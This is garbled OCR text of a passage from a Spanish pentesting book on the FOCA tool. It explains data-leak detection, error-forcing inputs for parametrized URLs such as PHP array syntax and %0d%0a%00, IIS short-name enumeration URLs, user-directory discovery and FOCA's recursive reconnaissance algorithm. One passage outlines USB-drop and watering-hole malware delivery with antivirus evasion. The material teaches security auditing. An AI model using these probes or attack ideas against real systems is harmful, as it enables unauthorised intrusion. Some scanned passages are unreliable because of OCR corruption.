"ctl : anditLo gPa rt s=4E , deny,  log,  auditing,  statu?  :  5 GO, mag :  1  Zope  Information 


-if 


Imogen  04.25:  Leaks  de  information. 


Mod  Security  es  un  modulo  muy  utilizado  en  Internet  para  la  fortification  dc  servidores  web  Apache 
o  de  servidores  Reverse  Proxy  que  publican  servicios  web  en  Internet,  Entre  las  muchas  protecdones 
que  ofrece  esta  la  de  detener  el  envio  de  paginas  de  respuesta  a  clientes  cuando  esa  pagina  tiene  un 
leak  de  information.  De  tal  manera  que  si  aparece  algun  leak  procedente  con  mensajes  de  error  de 
MySQL,  Oracle ,  Java,  etcetera  la  regia  lo  detecta  y  lo  bloquea. 

En  el  caso  de  FOCA  lo  que  sc  hace  con  ese  eonjunto  dc  reglas  anti-leak  es  justo  lo  contra rio  para 
lo  que  se  ereo,  Es  deeir,  Lodas  las  paginas  web  que  se  obtienen  a  panir  de  tod  as  las  pctieioncs  que 
FOCA  va  realizan  do  para  Lodas  y  cad  a  una  de  las  acciones  que  realiza  en  las  fases  de  Network 
Discovery ,  Fingerprinting  o  Anal i sis  dc  Vulnerabilidades,  pasan  a  ser  filtradas  una  a  una  por  ese 
eonjunto  de  expresiones  regu  lares  que  se  ban  incorporado  dentro  de  FOCA,  para  deteetar  justo  en 
que  lugar  hay  una  pagina  de  respuesta  que  ha  mostrado  informadon  sensible  de  seguridad. 

Estas  paginas  son  elasifieadas  en  el  arbol  de  vulnerabilidades,  junto  con  la  regia  quo  disparo  dicha 
catalogacibn  y  la  Ur l  de  petidon  que  se  hizo  para  obtener  esa  respuesta,  para  poder  com  pro  baric. 
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j  -  Er&jctf  ] '  i  look  tU>  Optk'fii 

a  -  -K  Fn.H^i  d 

i; 

11-  —  EanaUrc 
+  ■(■'•*  ftaks 
■-■■ijf  '^iiwabteles 
Backi** 

|  ■  -ra  Dreamy  ttfng 

ft  □HE  Active  Cach? 

Q.  ,C  5  store 
-*|  GmD6 

V  Insrti  je  Mrifiadi 

:$  SQL 


T asklist  ^*}  Plugins  '  Abcurt 


imagen  04,26:  Data  Leaks  localization  por  FOCA 


En  la  Imagen  anterior  se  puede  ver  como  FOCA  muestra  la  in  form  ac  ion  de  los  leaks  que  han  ido 
apareciendo.  Por  defecto,  hasta  la  incorporation  de  este  modulo  FOCA  solo  buscaba  en  las  petieiones 
tiaturales  sin  realizar  n ingun  esfuerzo  extra  en  la  generation  dc  fugas  de  informacion  por  medio  de 
mensajes  de  error,  pero  eso  cam  bio  en  las  ultimas  versiones. 


Generation  de  Errores  v  Data  Leaks  en  las  URLs  parametrizadas 

Denim  de  las  opciones  de  configuracion  de  FOCA.  hay  un  modulo  Mam  ado  “Common  Errores 
Enforcement”,  que  viene  a  signifiear  que  FOCA  intentara  provocar  mensajes  de  error  en  URLs  eon 
parimetros  inyectando  diferentes  %  alores.  Para  ello,  asociado  a  cada  servidor  web  hay  un  apartado 
donde  aparece  la  lista  de  URLs  que  tienen  parametros,  y  por  lo  tanto  que  pueden  ser  manipulados 
de  alguna  manera. 


|  f  ednatogy  recognition  Crswfclg  Exploiting  I  files 


Log 


..  Tcdvfltogy 
RecopToon 


A-  Minimize 


Conan  wvw  inf&rmatcfi&l.ccuji 

Fiw  fl  S3  found}  Folders  (44  found)  j  Pmurtfi  pubVstea  {565  fourd)  Backups  fO  found)  111  Paranwbfzcd  ^1 8  found) 


LHrectwy  bahng  enabled  (0  found)  [PAS1VE] 


Methods  on  f Dtdara  fOfgund)  PASIVEJ 

1 - - ,I,MN - 


E 


Tech,  asp  (4  found!  Tech.  aspx 


\77  found) 


HUisZ/www  jrforni^  364.com/7toocfls  a5pa^d=€ 


fctpv 
l  tip.. 
Nt+r 
http 


p /wnw  Horcn^ica64  jCom/DetsHe^al  -aapw  ^d^OMOl 0774 
p  JAmm  jn!onnaticaf4.c&Ti/detate¥hol  .aspx':W=  1 600 10769 

7  /Wnw  jnformEiicat4  con  /retaha  eking  /prat  a .  a  spa  ?i  d  _piSa*2 

://vi¥iw  riwmaica64  c^.dTianhafc.a^3ciudB^ 

http  Jt Www  jntomatica64.coni/lb!D5  aspw'ftd = 1  MG 

l^tpaZ/wwvr.lrftimatJcaMc^  'r^enasi  aw7gmpo^3*-t*^cricHc4t-40fticeAi  dce=3 
hslpZ/www  jTfcmaicij'W  =foca@i  dasd  .m&d=$GhZWTFzK29z2zl5d1  R^5b VWREUWZwbWzVVJ YTL 

https  ://www  irformatkaM  com.Wob  Rossduicc  axd^-IWuCVP&TiBVd  1  zvM  fLEwl  KTmSWhefibWlfQO  MlZ9cWgct4SbD0t*je£OB7O3t_MCRFzsyD  S3G  i 
pi/Ammi  Jifomialice&t  com/D^Bul  e3^^3pHenoip^=/defaut  aspx 


Imagen  04,27:  Lista  dc  URLs  parametrizadas  local izada  en  un  servidor  web 
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Actualmente  FOCA  no  hace  busqueda  de  parametros  en  URLs  que  ban  sido  filtradas  con  sistemas 
tipo  URLRewrite  por  !o  que  quedadan  fucra  de  esas  prucbas.  A  eada  una  de  las  URLs  paramctrizadas 
que  FOCA  descubre,  se  pueden  hacer  dos  lip  os  de  comprobaciones,  como  se  puede  ver  en  las 
opciones  de  configuraeion. 


Image n  04,28:  Opciones  de  forzado  de  errores 

El  primero  de  elios  es  un  escaneo  de  errores  de  conversion  en  las  Url  parametrizadas,  may  comun  en 
aplicaciones  PHP.  La  idea  es  loealizar  envios  de  parametros  numerieos  en  aplicaciones  PHP ,  como 
por  ejemplo  URLs  como  HTTP://www.testserver.com/dca.PHP?var=l  y  forzar  una  conversion  de 
lipos  implicita  en  la  llamada,  haciendo  algo  como  HTTP://www.iestservencom/dca.PHP?var[]-l 

Esta  sintaxis,  utilizando  los  corehetes,  forzara  a!  motor  PHP  a  converts  r  el  tipo  de  datos  del  parametro 
en  una  estructura  de  tipo  array .  Si  el  parametro  display  errors  en  el  fichero  de  configuraeion  PHP , 
ini  esta  active,  el  servidor  web  mostrara  un  mensaje  de  error  como  el  siguiente,  generando  un  data 
leak  que  FOCA  reconocera: 

-  Unsupported  operand  types  in  C:  \server\htdocs  \dca  \dca>  PHP  on  line  2 

El  segundo  de  ell  os  genera  una  serie  de  peticiones  eambiando  los  va  lores  en  todos  y  cad  a  uno  de  los 
parametros  descubiertos  en  las  Url  paramctrizadas,  asi  realizara: 

Una  peticion  con  el  parametro  vaefo 
Una  peticion  con  una  comill  a  simple 

-  Una  peticion  con  com  ilia  doble 

U  na  peticion  con  un  numero  muy  grande  para  generar  un  fallo  de  desbordamiento  de  tipos 
Una  peticion  con  una  cadena  con  saltos  de  Itnea  y  caracteres  mil  os  %0d%0a%00 

-  Una  peticion  con  un  string  en  los  valores  numerieos  del  tipo  F0C4F0C4 

-  Por  ultimo  una  peticion  con;  y  otra  con  ALT+126 

Con  cste  forzado  de  errores  active,  las  posibilidades  de  que  el  sitio  web  mueslre  data  leaks  aumenlan. 


166 


Pentesting  con  FOCA 


IIS  Url  Short  name 

Para  todos  los  servidores  Internet  Information  Services  descubiertos  en  el  dominio  analizado,  FOCA 
comprueba  la  caractenstica  IIS  Short  Name,  que  permite  realizar  un  descubrimiento  de  ficheros 
en  un  servidor  web  por  medio  del  si  sterna  dc  nombres  acorlados  que  aim  incorpora  el  si  sterna  de 
ficheros  en  Microsoft  Windows . 

La  herencia  de  los  8:3  caracteres  en  el  nombre  de  los  ficheros  en  un  sistema  Microsoft  Windows , 
hace  que  aun  sea  posible  poder  acceder  a  un  fie  hero  utilizando  ambos  me  todos,  es  decir,  el  del 
nombre  acortado  y  el  del  nombre  extendido.  Ann  que  esta  caractenstica  esta  disponible  en  Windows , 
en  IIS  no  es  posible,  asi,  tanto  si  el  tichero  se  encuentra  como  si  no,  se  generara  un  error. 

El  servidor  IIS,  cuando  se  solicita  un  nombre  acortado,  va  a  i  men  tar  acceder  al  mismo,  y  si  lo 
encuentra,  dara  un  error  404,  algo  que  no  deberia  ocurrir.  El  caso  es  que  euando  el  tichero  si  esta,  se 
continua  ejecutando  el  pro  ees  ami  onto  de  la  Url,  y  si  se  construye  una  Url  con  ingen  io,  un  atacante 
podria  conseguir  un  error  de  Bad  Request 

Jugando  con  los  errores  404  y  los  errores  Bad  Request?  es  posible  implementar  un  ataque  a  cicgas 
para  descubrir  el  nombre  de  los  ficheros  alojados  en  el  servidor.  Esto  se  puede  hacer  solo  en  algunas 
versiones  de  IIS  y  .NET  en  las  que  no  se  ha  flltrado  el  caracter  *  y  en  las  que  los  errores  400  de  Bad 
Request  y  404  de  Not  Found  son  distintos. 

Si  el  sitio  es  vulnerable  se  puede  proceder  a  realizar  la  taooleanizacion  haeiendo  uso  del  simbolo 
de  acortamiento  en  el  nombre  -1 ,  el  caracter  comodm  *,  y  tomando  ei  error  404  como  un  True  y  el 
Bad  Request  como  un  False ,  La  siguiente  tabla  recoge  las  pruebas  a  realizar,  y  los  resultados  que  se 
obtienen  cuando  el  nombre  del  fichero  existe  (valid)  o  no  existe  (invalid): 


IIS  Version 

URL 

Result/Error  Message 

ItS  6 

/valid^lV-aspx 

HTTP  404  -  Rte  not  found 

ItS  6 

/lrvalid**'l*/-aspx 

HTTP  400  -  Bad  Request 

US  5.x 

/validol* 

HTTP  404 -file  not  found 

IIS  5.x 

/Invalid*'*!* 

HTTP  400  -  Bad  Request 

US  7.x. Net. 2 

No  Error  Handling 

/valid*'"!*/ 

Page  contains: 

"Error  Code  0x00000000“ 

ItS  7.x.  Net. 2 

No  Error  Handling 

/Invalid*"!*/ 

Page  contains: 

"Error  Code  0x80070002" 

Imagen  04.29:  Pruebas  para  reconocer  True  y  False  en  servidores  IIS. 


Con  esta  fecnica  solo  se  pueden  descubrir  los  6  primeros  caracteres  del  nombre,  ya  que  los  ultimos 
2  seran  -i  o  -2,  y  luego  la  extension  sera  de  3  letras,  LI  egad  o  a  este  punto,  un  atacante  tendria  que 
tratar  de  i uteri r  los  ultimos  caracteres  del  nombre  y  la  extension. 

Para  automatizar  este  eseaneo  se  han  desarrollado  dos  plugins  para  FOCA ,  IIS  Shortname  Extractor 
y  NTFS  Based  Server  Enumerator ,  que  son  deserilos  en  el  proximo  eapitulo. 
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Directorios  de  usuarios 

FOCA  iambi  en  es  capaz  de  localizar  directorios  que  probablemente  provengan  de  usuarios  del 
sistema  operative  que  ban  obtenido  espacio  de  publicacion  en  los  servidores  web  Apache  del  sistema 
por  la  instalacidn  del  modulo  mod  user  dir. 


Este  modulo  permite  generar  una  carpeta  en  el  servicio  web  para  cad  a  usuario,  colgando  de  ana  Ur l 
que  se  indica  con  el  caracter  tilde  o  virgulilla  seguido  del  nombre  del  usuario.  Es  deeir,  algo  como 
-usuario. 
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Hi 


Imagen  04.30:  Directorios  de  usuarios  descubicrtos  cn  un  servidor  web. 


Cuando  FOCA  detecta  una  Url  en  la  que  aparece  una  estructura  como  la  descrita,  entonees  lo  indica 
en  el  arboi  de  vu  In  erabil  idades  para  que  el  auditor  pueda  profundizar  en  el  analisis  de  estc  servidor 
web  por  medio  de  otras  estrategias. 


Por  ejemplo,  creando  un  archivo  coo  la  lista  de  usuarios  que  han  sido  obtenidos  de  los  metadatas 
de  los  ficheros  publicados  en  el  dominio  objetivo,  se  podria  utilizar  crear  un  diccionario  de  nombres 
que  pudiera  ser  utilizado  como  base  para  hacer  fuzzing  en  el  servidor  weh,  utibzando  el  plugin 
web  Fuzzer  deserito  en  el  proximo  capitulo,  donde  se  ha  detectado  la  Vulnerabilidad,  tratando  de 
encontrar  todos  los  directories  de  todos  los  usuarios. 


Por  supuesto,  un  rrial  uso  de  las  carpetas  compartldas  via  web  por  parte  de  los  usuarios  podria 
significar  tambien  que  se  descubrieran  archivos  y/o  documentos  propios  de  los  directorios  personates 
con  los  que  el  usuario  trabaja  en  su  maquina. 

Hay  que  tener  en  cuenta  que  esta  Vulnerabilidad  solo  aparecera  cuando  se  descubra  alguna  Url 
con  este  formate,  pero  puede  ser  que  el  servidor  ienga  el  modulo  mod  user  dir  y  FOCA  no  haya 
detectado  usuarios.  Es  conveniente  revisar  cl  software  que  de  un  determ  inado  servidor  web  FOCA 
ha  sido  capaz  do  dcseubrir,  revisando  con  calma  el  banner  obtenido  via  Shodan,  o  via  las  pmebas 
de  fingerprinting.  En  algunos  servidores  aparecera  indicado  en  el  banner  el  modulo  mod  users  dir. 
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2.  El  algoritmo  paso  a  paso 

Teniendo  en  cuenta  todos  los  aspectos  de  FOCA  que  se  han  estudiado  en  los  capitulos  dedicados  al 
analisis  de  los  metadatas  en  los  documentos  publicos,  los  procesos  de  descubrimienlo  de  la  red  del 
dominio  objetivo  y  las  teen leas  de  localizacion  de  las  vulnerabilidades  descritas  durante  el  presente 
capitulo,  es  posible  tener  una  vision  global  del  algoritmo  que  el  programa  lleva  a  cabo  de  forma 
aulomatica  para  descubrir  equipos  clientes  y  servidores,  dominios  y  subdominios,  roles  de  los 
servidores,  directories,  usuarios  y  todo  el  resto  de  informacion  de  un  dominio  objetivo, 

Para  hacer  un  resumen  mas  o  menos  compJeto  de  todo  lo  visto  hasta  el  momento  en  todos  los 
capitulos  que  llevamos,  supongamos  que  FOCA  ha  descubierto  un  documento  de  Microsoft  Word 
publicado  en  la  siguiente  ruta: 

HTTP: //Apple  1. sub.  domain.  comNch  emafdir/fiL  doc. 

En  las  primeras  versiones  de  FOCA  el  documento  se  descargaba  y  se  analizaban  los  metadatas, 
pero  ahora  el  descubrimiento  del  documento  con  un  proyeeto  de  FOCA  abierto,  genera  una  buena 
cantidad  de  tareas  mucho  antes  de  que  sc  proceda  a  deseargar  el  documento,  ya  que  hay  una  gran 
cantidad  de  informacion  que  es  posible  obtener  con  analisis  detallados,  simplemente  teniendo  esa 
Urt. 


1.  En  primer  lugar,  ya  que  la  Url  comienza  con  HTTP ,  es  evidente  que  el  servidor  ofrece  el 
servicio  web,  por  lo  que  se  anade  este  rol  al  equipo. 

2.  A  continuation  FOCA  solicita  el  banner  y  se  extrae  toda  la  information  del  servidor. 

3.  Ademas,  se  extrae  el  dominio  principal  y  se  anade  a  la  lista  de  dominios. 

4.  A  continuacion  se  buscan  registros  bien  eonocidos  para  este  dominio. 

5.  Sub.domain.com  es  un  subdominio,  por  lo  que  se  anade  a  la  lista  de  dominios. 

6.  Y  se  realizan  tambien  consultas  DNS  para  los  registros  wed  known. 

7.  Ahora,  para  todos  los  servidores  que  no  se  encontraban  localizados  en  n ingun  dominio,  se 
tratan  de  resolver  sus  nombres  en  los  nuevos  dominios  localizados. 

8.  Se  obtisne  Apple  1 . subdomain. domain. com  como  nuevo  nombre  de  equipo, 

9.  De  forma  manual  se  puede  aplicar  DNS  prediction  con  Apple!  para  eada  dominio,  proban  do 
A pple2,  AppIeS...  etc . 

10.  A  continuacion  se  resuelve  la  direction  IP  del  equipo. 

11.  Sc  obticnc  el  certificado  digital  de  la  conexion  /  ITT  PS. 

12.  Y  se  buscan  nuevos  dominios  incluidos  en  el  certificado. 

13.  Se  obtiene  el  banner  del  servidor  usando  la  IP,  en  lugar  del  nombre  de  dominio. 
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14.  Entonces  se  usa  Bing  IP ,  para  tratar  de  localizar  otros  dominies  alojados  en  esa  misma 
direccion  IP. 

15.  Se  repite  el  algoritmo  para  cada  nuevo  dominio 

16.  FOCA  se  conecta  entonces  a  los  servidores  de  nombres  internes  disponibles. 

17.  Se  realiza  un  scanner  PTR  para  tratar  de  encontrar  maquirias  de  la  red  interna. 

18.  Para  cada  direccion  IP  que  se  localice,  se  aplica  de  nuevo  Bing  IP. 

1 9.  Ademas,  se  tratara  de  extraer  de  la  Ur!  nombres  de  usuario,  come  Chema  en  nuestro  ejemplo. 

20.  Se  extraen  los  nombres  de  directories  de  la  Url  En  este  case  serian  los  directorios  /,  /-chema/ 
y  A chema/dirZ 

21  *  Se  intenta  realizar  directory  listing  en  cada  directorio  encon trade. 

22.  En  cada  ruta,  se  prueban  metodos  HTTP  inseguros  (PUT.  DELETE s  TRACE.,.). 

23.  Se  trata  de  identificar  el  software  a  traves  de  los  mensajes  de  error  404. 

24.  Y  a  traves  de  los  mensajes  de  error  de  las  frameworks  tipo  JSP  o  ASP. 

25.  Se  Oeva  a  cabo  una  busqueda  por  diccionario  probando  nombres  de  equipos  y  servidores 
comunes  contra  los  servidores  DNS  disponibles. 

26.  Se  intenta  obtener  una  transferencia  de  zona  para  obtener  todos  los  registros  del  mapa  del 
dominio  objetivo. 

27.  Se  buscan  nnevas  URLs  Index adas  en  buscad{>res  que  esten  relacionadas  con  el  nombre  de 
equipo 

28.  Despues  se  descarga  el  fichero. 

29.  Sc  extraen  sus  metadatas,  la  informacion  oculta  y  los  datos  perdidos 

30.  Se  ordena  la  informacion  y  se  presenta  de  forma  seneilla  y  clara. 

31.  Y,  final  mettle,  por  cada  direccion  IP  o  por  cada  Url  que  se  hay  a  e  neon  trad  o  se  repite  de 
nuevo  el  algoritmo. 

Todo  este  proceso  es  un  cambio  de  funcionamiento  totalmenfe  distinto  a  como  funcionaban  las 
primeras  versiones  de  FOCA ,  donde  todo  era  mucho  mas  manual,  Aun  asi,  muchas  de  las  funciones 
que  se  han  descrito  en  tod  as  las  fases  del  proyecto  pueden  seguir  haeiendose  de  manera  manual,  con 
lo  que  siempre  se  puede  volver  a  generar  mucho  mas  conocimiento  del  que  a  priori  FOCA  ha  sido 
capaz  dc  obtener. 

Ademas,  la  activation  de  las  URLs  generara  tambien  la  busqueda  de  vulnerabilidades,  as!  por 
ejemplo  sera  distinto  el  proceso  que  se  realizara  cuando  se  detecte  un  servidor  como  intereambiador 
de  eorreo  porque  aparecia  su  direccion  IP  en  un  registro  MX  o  en  un  registro  SPF ,  que  cuando  el 
servidor  hay  a  sido  marcado  como  servidor  DNS. 
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3.Un  ejemplo  con  FOCA 

Para  mostrar  la  potencia  de  FOCA  respecto  al  descubrimiento  automatico  de  vulnerabilidades  en  los 
servidores  loealjzados  de  un  proyeeto  se  van  a  mostrar  los  resultados  de  analizar  el  dominio  de  una 
gran  universidad  americana  que  se  ha  volcado  en  abrir  sus  clases  a  traves  de  la  web  y  que  permite 
a  usuarios  de  todo  el  mundo  matricularse  en  gran  eantidad  de  cursos  a  traves  de  su  plataforma 
MQQC  {Massive  Online  Open  Courses)  y  que  supondremos  que  nos  ha  contratado  para  reatizar  una 
auditoria  de  seguridad  de  su  red.  En  este  analisis,  de  nuevo  eaneelamos  todas  las  opeiones  intrusivas, 
y  por  lo  tanlo  se  desactiva  la  transferencia  de  zonas  DNS y  el  forzado  de  errores  para  provocar  fugas 
de  informacion. 


Para  las  primeras  fases  de  la  auditoria  se  podria  ulilizar  FOCA ,  ya  que.  como  se  ha  mostrado  a  lo 
largo  de  los  ultimos  Ires  eapitulos,  esta  herramienta  puede  automatizar  gran  parte  del  trabajo  inicial 
y  ayudara  a  los  pen  testers  a  dirigir  el  resto  de  la  auditoria. 
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Imager  04.31 :  Dominios,  servidores  y  maquinas  dientes. 


En  este  proceso  se  han  utilizado  todas  las  funcionalidades  de  analisis  de  metadatas  estudiadas  en  el 
segundo  eapitulo  para  localizar  y  deseargar  todas  los  documentos  publieados  en  la  web  y  proeeder  a 
analizar  sus  metadatas ,  dates  perdidos  e  informacion  oculta. 


Capitulo  IV  Busqueda  de  Vulnerahilidades 


171 


Tambien  se  ha  procedido  con  el  uso  de  las  opeiones  de  descubrimiento  de  la  red  descritas  en  el  terccr 
capitulo,  como  las  relacionadas  con  las  consultas  DNS \  busquedas  con  diccionario,  transferences  de 
zona,  uso  dc  Bing  IP  y  la  consuita  a  Robtex  y  Shodan;  y  haciendo  tambien  uso  de  las  funcionalidades 
descritas  en  este  cuarto  capitulo  relacionadas  con  la  busqueda  de  vulnerabilidades  en  los  servidores 
localizados,  seria  posible  recolectar  una  gran  cantidad  dc  informacion  que  resultaria  de  gran  ayuda 
para  plantear  el  resto  de  la  auditoria. 

Tal  y  como  puede  verse  en  la  figura  043 [,  FOCA  ha  sido  capaz  de  local izar  cientos  dc  dominies, 
servidores  y  maquinas  de  clientes  del  dominio  estudiado,  permitiendo  a  los  and i tores  real  izar  un 
mapa  muy  complete  de  la  red  de  la  Universidad  y  elaborar  una  lista  con  un  gran  numero  de  posibles 
objetivos  y  con  cantidad  de  informacion  sobre  cada  uno  de  cllos. 

Pero,  tal  y  como  se  ha  estudiado  en  este  capitulo,  FOCA  no  solo  eonsigue  informacion  sobre  los 
servicios  y  versiones  de  software  instaladas  en  los  servidores,  sino  que  trata  dc  valorar  si  cada  equipo 
localizado  presenta  alguna  de  las  vulnerabilidades  que  el  programa  es  capaz  de  descubrir. 

As l,  en  el  caso  de  la  Universidad  americana  analizada,  se  pude  observar  en  la  imagen  0432  como 
FOCA  ha  descubierto  una  gran  cantidad  de  vulnerabilidades  en  sus  servidores,  como  listados  de 
directories,  ficheros  DS  Store,  metodos  inseguros,  IIS  Short  Name,  Multiple  choices ,  ficheros  ,Svn 
entries,  servidores  con  leaks  de  informacion  y  con  directories  de  usuarios  y  una  enorme  lista  de 
equipos  en  los  que  se  han  localizado  ficheros  jugosos  que  podran  ser  estudiados  por  los  auditores 
en  detalle. 


Imagen  0432:  Vulnerabilidades. 
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I  oda  esla  infomiacion  resultara  muy  valiosa  para  que  un  pentester  pueda  dirigir  el  resto  del  proeeso 
y>  Por  ejemplo4  haeiendo  uso  de  los plugins  de  FOCA  y  de  Ids  trucos  que  se  presentan  en  el  proximo 
capitulo,  podrian  explolarse  algunas  de  estas  vulnerabilidades  para  obtener  gran  cantidad  de 
informaeion  sobre  la  estructura  interna  de  los  servidores  vulnerables. 


Par  otra  parte,  los  auditores  tambien  podrian  hacer  uso  de  la  informacldn  obtenida  por  FOCA 
mediante  el  analisis  de  los  metadatas  de  los  fieheros  publicados  en  los  servidores,  de  la  que  se 
muestra  un  pequeno  ejemplo  en  la  imagen  0433. 
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Imagen  04.33:  Usuario  s,  emails,  software  y  directories. 


De  cada  uno  de  los  servidores  y  equipos  clientes  localizados,  FOCA  informa  sobre  los  usuarios 
validos  en  el  equipo,  rutas  y  directories  compartidos,  sistema  operativo,  software  instalado,  etcetera. 
Ademas,  entre  oiros  muchos  datos,  FOCA  provee  a  los  auditores  de  una  lista  de  correos  elec troni cos 
localizados  en  los  documentos. 

UtHizando  toda  esta  informaeion,  como  parte  de  la  auditoria  el  pentester  podria  preparar  un  ataque 
dirigido,  tal  y  como  se  mostro  en  la  ultima  section  del  capftulo  de  analisis  de  metadatas,  ebgiendo 
un  usuario  con  perm  isos  de  escritura  en  un  determinado  servidor  eon  varias  carp  etas  compartidas  a 
las  que  accedan  otros  usuarios,  de  manera  que  sea  sencillo  instalar  un  malware  sin  Ilamar  demasiado 
la  at  en  cion.  Si  se  dispone  del  nombre  completo  del  usuario,  su  localization  en  Internet  a  traves  de 
redes  sociales  como  Linked  IN  resultaria  mas  sencilla  aun,  de  forma  que  pudiera  entregarsele  un 
pendrive  con  el  malware  con  el  objeto  de  que  lo  conecte  al  equipo  seleccionado  como  pumo  de 
entrada  en  ei  sistema  analizadcu 
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O,  incluso,  al  estilo  de  los  alaques  APT  {Advanced  Persistent  Threat ),  un  atacante  podria  vulnerar 
servidores  legitimos  que  se  supone  que  el  usuario  puede  visitar  (tras  realizar  un  estudio  de  su  peril  I 
publico  en  internet)  para  distribuir  el  malware  elegido. 

Si  ademas  se  conoce  el  software  antivirus  utilizado  (mediante  las  teen ic as  descritas  de  DNS  Cache 
Snooping,  por  ejetnpio),  el  malware  podria  modiiicarse  de  manera  que  fuera  aim  mas  complicada 
su  detection.  Es  decir,  una  vez  que  se  tiene  la  information,  el  resto  del  ataque  es  cosa  del pentester. 
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Capitulo  V 

Plugins,  informes  y  otros  trucos 


A  lo  largo  de  este  capitulo  se  van  a  realizar  ciertas  puntualizaciones  o  aclaraciones  respecto  a! 
fundonamiento  de  FOCA  y  se  mostraran  algunas  opciones  de  configuracion  que  no  estan 
direetamenle  relacionadas  eon  el  analisis  de  metadatas,  el  descubrimiento  de  la  red  o  la  Localization 
de  vulnerabilidades,  pero  que  im  usuario  avanzado  de  FOCA  debe  conocer  para  sacar  el  maxima 
partido  a  la  aplicacion, 

A  continuation  se  presentaran  una  serie  de  situaciones  que  pueden  darse  durante  una  auditor  fa  de 
seguridad  en  las  que  FOCA ,  en  elaboration  con  otras  aplicaciones  como  Burp  Suite ,  las  tecnicas 
de  Evil  Grade  o  el  uso  de  Meta&ploiU  puede  resultar  una  herramienta  fundamental  para  el  exito  de 
las  pruebas. 

Se  estudiaran  posteriormente  los  diferentes plugins  que  han  sido  desarrollados  hasta  el  memento  para 
FOCA  y  se  vera  el  API  de  conexion  para  poder  crear plugins  propios  que  extiendan  la  funcionalidad 
de  la  herramienta.  Hasta  el  memento,  los  plugins  que  vienen  desarrollados  permiten  aprovechar 
diferentes  vulnerabilidades  descubiertas  en  los  servidores  del  dominio  auditado  con  FOCA,  con  el 
objetivo  de  aver i guar  aun  mas  sobre  la  estructura  interna  del  servidor,  buscar  archives  que  puedan 
serjugosos  para  una  auditorfa  y  obtener  toda  la  information  posible  que,  en  ultima  instaneia,  pueda 
permitir  una  escalada  de  privileging. 

Por  d  momento  FOCA  viene  con  una  herramienta  para  explotar  DNS  Cache  Snooping „  con  un 
plugin  para  hacer  web  fuzzering ,  con  una  pequena  tool  para  explotar  una  Vulnerabilidad  de  SQL 
inject  ion,  con  un  a  n  a  M  z  ad  o  vf  Ex  tractor  de  informacion  para  los  repositorios  Subversion  y  el  fichero 
.Svn/en  tries  y  con  un  plugin  para  sacar  partido  del  bug  de  IIS  Short  Name  en  los  servidores  de 
Microsoft  Internet  Information  Services  que  presenten  esta  Vulnerabilidad. 

FOCA  tambien  tiene  una  pequena  herramienta  de  generation  de  informes,  cuyo  uso  sera  mostrado 
a  continuation.  Esta  herramienta  perrnite  presentar  de  forma  elara  y  seneilla  los  resultados  que  se 
extraen  de  los  proyectos  realizados,  incluyendo  la  posibilidad  de  editar  los  intomies  para  adaptarlos 
a  la  pohtica  corporativa. 

Finalmente  se  presentara  la  herramienta  FOCA  Online  que  puede  venir  bien  en  determ inadas 
ocasiones.  Es  una  aplieacion  web  muy  seneilla  que  perrnite  realizar  el  analisis  de  los  metadatas 
contenidos  en  ciertos  tipos  de  documehtos  ofimaiicos  e  imagenes  de  forma  lacil  y  rapida  a  traves  de 
una  pagina  web,  Asi,  cuando  no  se  tenga  a  mano  la  herramienta  completa  de  FOCA  se  puede  hacer 
uso  de  la  version  online. 
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l.Funcioiies  avanzadas  de  FOCA 

En  FOCA  existen  tunciones  utiles  que  pueden  utilizarse  durante  el  proceso  de  auditoria.  Estas 
utilidades  permitiran  saear  mas  provecho  de  la  herramienta  y  conseguir  mejores  resultados  tanto  en 
rendimiento  como  en  datos  ohtenidos.  Aqm  va  una  lista  de  las  prineipales  caracteristieas. 


Como  ha  localizado  FOCA  la  informacion 

En  todo  momento  FOCA  infbrma  al  usuario  de  como  se  ha  localizado  cada  dato.  For  ejemplo,  en  ]a 
imagen  05.01  es  posible  comprobar  como  se  han  eneontrado  diferentes  servidores  para  el  dominio 
Apple, com  accediendo  a  los  detalles  de  cada  equipo; 

-  Unos  se  han  eneontrado  tras  realizar  consultas  a  los  servidores  DNS 
Otros  se  han  inferido  tras  localizar  un  documenlo  en  un  motor  de  husqueda 

-  Otros  se  han  obtenido  con  informacion  de  Robtex  o  Skoda  n. 

-  Varios  servidores  se  han  localizado  tras  realizar  una  consul  la  en  Bing  IP 


V  algunos  han  sido  descubiertos  tras  analizar  el  certificado  digital  de  una  conexion  HTTPS 
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Csrtficate  Rngerftotjhi]  >  DNS  rBudutem  {220205.15} 
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imagen  05.01:  Servidores  del  dominio  Apple  xom  loealixados  por  diferentes  metodos. 


Como  se  puede  ver,  el  algoritmo  recursive  de  FOCA  permits  que  la  misma  informacion  sea 
encontrada  dc  forma  distinta.  (ncluso  dos  procesos  dc pentesting  sabre  el  mismo  dominio  realizados 
con  FOCA ,  cambiaran  cn  los  resultados  dependiendo  de  cual  sea  el  orden  en  que  la  herramienta 
encuentre  las  URLs,  los  servidores,  etcetera. 

No  es  descabellado  realizar  varios  analisis  sobre  el  mismo  dominio  con  FOCA  para  encontrar 
informacion  d  lie  rente. 
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Busqueda  personalizada 

Por  defee  to,  FOCA  busca  ficheros  indexados  en  Jos  buscadores  de  Internet  que  se  hay  an 
seleceionado  en  el  panel  de  Metadata  que  tengan  que  ver  unica  y  exclusivamente  con  direcciones 
URL  pertene dentes  al  dominio  principal  del  proyeeto  y  sin  poner  ninguna  otra  restriceion  adicional 
que  el  lipo  de  ficheros  que  el  usuario  ha  seleceionado  en  el  panel  del  tipo  de  archives,  algo  que 
implicara  en  la  extension  y  el  filetype  de  los  ficheros  buscados. 

En  el  caso  de  querer  personal izar  la  busqueda  de  documentos  anadiendo  mas  filtros  para  poder 
restringir  o  expandir  los  resultados  -  segun  sea  la  necesidad  en  cada  caso  es  posible  entonces 
cambiar  ios  parametros  de  la  eadena  de  busqueda  que  se  va  a  enviar  a  los  motores  de  busqueda, 

Para  dlo  es  sufic  iente  con  apretar  sobre  la  opcion  Custom  Search  y  FOCA  desplegara  un  cuadro 
de  texto  donde  se  podra  cambiar  la  configuracion  de  busqueda  para  adaptarla  a  las  necesidades  del 
auditor.  Hay  que  tener  en  euenta  que  esas  cadenas  do  busqueda  personalizadas  no  tienen  por  que 
funcionar  igual  en  todos  los  motores  de  busqueda. 


Imagen  05,02:  Busqueda  personalizada, 

Esta  opcion  es  muy  util  cuando  se  quiere  seleccionar  muy  bien  el  objetivo.  Hay  que  tener  presente 
que  e!  modulo  de  busqueda  de  documentos  es  tambien  un  modulo  de  busqueda  de  URLs,  asi  que  si 
se  encuentra  cualquier  Url  a  trav£s  de  el  -  incluso  aunque  no  sea  de  ningun  documento  ofimatico 
